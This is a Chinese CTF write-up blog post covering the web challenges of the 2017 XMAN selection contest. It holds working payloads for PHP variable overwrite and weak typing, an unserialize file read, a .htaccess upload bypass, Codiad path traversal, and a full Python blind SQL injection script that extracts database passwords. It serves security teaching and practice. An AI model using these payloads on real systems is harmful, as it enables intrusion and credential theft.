Chybeta

XMAN选拔赛-2017-web-writeup

发表于 | 分类于 | 阅读次数

XMAN选拔赛-2017-web-writeup 都是基础题目

variacover

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<meta charset="utf-8">
<?php
error_reporting(0);
if (empty($_GET['b'])) {
   show_source(__FILE__);
   die();
}else{
   include('flag.php');
$a = "www.XMAN.com";
$b = $_GET['b'];
@parse_str($b);
if ($a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO')) {
   echo $flag;
}else{
exit('你的答案不对0.0');
}
}
?>

parse_str变量覆盖漏洞,和php弱类型比较问题。

1
http://challenges.xctf.org.cn:7771/?b=a[0]=240610708

得到flag:

1
XMAN{A_sTr_covcderd_t3st_you_oW?}

urldecode

改为XMAN后提示urldecode:

考点应该是类似二次注入类型,
将XMAN进行一次urlencode,再把其中的%替换为%25,最后的payload:

1
http://challenges.xctf.org.cn:7772/?me=%2558%254d%2541%254e

得到flag

1
XMAN{UrlDeCode_CooL_yOu_u0D3rSta9D!

upload

比赛时没做这题。
.htaccess。先自己新建一个文件.htaccess,内容如下:

1
2
3
<FilesMatch "_chybeta.gif">
SetHandler application/x-httpd-php
</FilesMatch>

然后现在要上传跟我说已经exist了。好吧GG。比赛结束后没人维护了。

unserialize

访问:

1
http://challenges.xctf.org.cn:7774/?code=1

得到hint: flag.php。访问:

1
http://challenges.xctf.org.cn:7774/flag.php

得到hint2: help.php

1
http://challenges.xctf.org.cn:7774/help.php

得到hint3:

1
class FileClass{ public $filename = 'error.log'; public function __toString(){ return file_get_contents($this->filename); } }

知道是反序列化问题,用下面代码生成:

1
2
3
4
5
6
7
8
9
10
11
<?php
class FileClass{
	public $filename = 'error.log';
	public function __toString(){
		return file_get_contents($this->filename);
	}
}
$chybeta = new FileClass();
$chybeta->filename = 'flag.php';
echo serialize($chybeta);

访问:

1
http://challenges.xctf.org.cn:7774/?code=O:9:"FileClass":1:{s:8:"filename";s:8:"flag.php";}

最后flag

1
XMAN{UUNser1AL1Z3_XMAN__0)(0}

这题源码:
index.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php
if(empty($_GET['code'])){
exit('?code=');
}
class FileClass{
    public $filename = 'error.log';
    public function __toString(){
        return file_get_contents($this->filename);
    }
}
class User{
    public $age = 0;  
    public $name = '';  
    public function __toString()  
    {  
        return 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';  
    }  
}
echo "hint: flag.php";
$obj = unserialize($_GET['code']);
echo $obj;
?>

PHP

扫到index.php~,源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
<?php
$a=0;
$b=0;
$c=0;
if (isset($_GET['aaa']))
{
        $aaa = $_GET['aaa'];
		$aaa=="1"?die("Emmm..."):NULL;
        switch ($aaa)
        {
        case 0:
        case 1:
                $a=1;
                break;
        }
}
$bbb=(array)json_decode(@$_GET['bbb']);
if(is_array($bbb)){
    is_numeric(@$bbb["ccc"])?die("Emmm..."):NULL;
    if(@$bbb["ccc"]){
        ($bbb["ccc"]>2017)?$b=1:NULL;
    }
	if(is_array(@$bbb["ddd"])){
        if(count($bbb["ddd"])!==2 OR !is_array($bbb["ddd"][0])) die("Emmm...");
        $eee = array_search("XMAN", $bbb["ddd"]);
        $eee===false?die("Emmm..."):NULL;
        foreach($bbb["ddd"] as $key=>$val){
            $val==="XMAN"?die("Emmm..."):NULL;
        }
        $c=1;
}
}
if($a && $b && $c){
    include "flag.php";
    echo $flag;
}
?>

考察php弱类型。payload如下:

1
http://challenges.xctf.org.cn:8004/index.php?aaa=1abcdef&bbb={"ccc":"2018a","ddd":[[1],0]}

得到flag:

1
XMAN{PHP_IS_THE_BEST_LANGUAGE}

downloaded

用admin登陆后发现是Codiad 2.5.3,exploit-db上找到poc

1
https://www.exploit-db.com/exploits/36371/

找flag的位置花了一点时间。最后paylaod:

1
http://challenges.xctf.org.cn:7775/components/filemanager/download.php?path=../../../../../../../../../../../var/www/flag.txt&type=undefined

1
XMAN{D0WnL0D_3v3RYTh1ng_You_Win}

spring

CVE-2017-4971:Spring WebFlow漏洞。到处找poc。

1
XMAN{UGhoiXoeDae6zeethaxoh1eex3xeiJ7y}

参考:https://github.com/Medicean/VulApps/tree/master/s/springwebflow/1

CTF用户登录

在登陆处存在注入,登陆成功与否加载了html标签前,直接用浏览器看是看不到的不会解析。经过fuzz,可以知道过滤了逗号,空格等,但union select,substr,and,or,单引号,#没有过滤。

  • 逗号被过滤,可以用以下方式绕过:

    1
    2
    3
    mid(user() from 1 for 1)
    substr(user() from 1 for 1)

  • 空格被过滤,可以用tab键绕过,其url编码为%09

所以这题就是盲注,下面附上python脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
# -*- coding:utf-8 -*-
import requests
import string
import sys
global findBit
def sendPayload(payload):
	proxy = {"http":"http://127.0.0.1:8080"}
	url = "http://challenges.xctf.org.cn:8003/login.php"
	headers = {"Content-Type": "application/x-www-form-urlencoded"}
	parm = "username="+payload+"&password=bb&submit="
	content = requests.post(url,data=parm,headers=headers,proxies=proxy)
	return content.text
cuowu = '\u9519\u8bef'.decode('unicode_escape')
def generateTarget(flag):
	if flag == "database":
		return "database()"
	elif flag == "tables":
		return "(SELECT%09GROUP_CONCAT(table_name%09SEPARATOR%090x3c62723e)%09FROM%09INFORMATION_SCHEMA.TABLES%09WHERE%09TABLE_SCHEMA=0x786d616e)"
	elif flag == "columns":
		return "(SELECT%09GROUP_CONCAT(column_name%09SEPARATOR%090x3c62723e)%09FROM%09INFORMATION_SCHEMA.COLUMNS%09WHERE%09TABLE_NAME=0x6374665f7573657273)"
	elif flag == "data":
		return "(SELECT%09GROUP_CONCAT(gpass%09SEPARATOR%090x3c62723e)%09FROM%09ctf_users)"
def doubleSearch(leftNum,rightNum,i,target):
	global findBit
	midNum = (leftNum + rightNum) / 2
	if (rightNum != leftNum +1):
		payload = "a'%09or%09(%09select%09ascii(substr("+generateTarget(target) +"%09from%09"+ str(i) +"%09for%091))<="+str(midNum) +")%23"
		# print payload
		recv = sendPayload(payload)
		# print recv
		if cuowu in recv:
			# print 'cuowu'
			# raw_input()
			doubleSearch(midNum,rightNum,i,target)
		else:
			# print 'chenggong'
			# raw_input()
			doubleSearch(leftNum,midNum,i,target)
	else:
		if rightNum != 0:
			# print rightNum
			# raw_input()
			sys.stdout.write(chr(rightNum))
			sys.stdout.flush()
		else:
			findBit = 1
			return
def exp():
	global findBit
	i = 1
	findBit = 0
	print "The database:"
	target = "database"
	while i :
		doubleSearch(-1,255,i,target)
		i += 1
		if findBit == 1:
			sys.stdout.write("\r\n")
			break
	i = 1
	findBit = 0
	print "The tables:"
	target = "tables"
	while i :
		doubleSearch(-1,255,i,target)
		i += 1
		if findBit == 1:
			sys.stdout.write("\r\n")
			break
	i = 1
	findBit = 0
	print "The columns:"
	target = "columns"
	while i :
		doubleSearch(-1,255,i,target)
		i += 1
		if findBit == 1:
			sys.stdout.write("\r\n")
			break
	i = 1
	findBit = 0
	print "The data:"
	target = "data"
	while i :
		doubleSearch(-1,255,i,target)
		i += 1
		if findBit == 1:
			sys.stdout.write("\r\n")
			break
exp()

最后flag:

1
XMAN{DO_you_l1ke_sqlmap_sqlmap}

倾听世界的声音

XSS,还没开始研究。膜拜大佬。

参考:http://www.cnblogs.com/zaki-Gui/p/7115821.html

微信扫码加入知识星球【漏洞百出】
chybeta WeChat Pay

点击图片放大,扫码知识星球【漏洞百出】

本文标题:XMAN选拔赛-2017-web-writeup

文章作者:chybeta

发布时间:2017年07月16日 - 11:07

最后更新:2017年07月28日 - 15:07

原始链接:http://chybeta.github.io/2017/07/16/XMAN选拔赛-2017-web-writeup/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。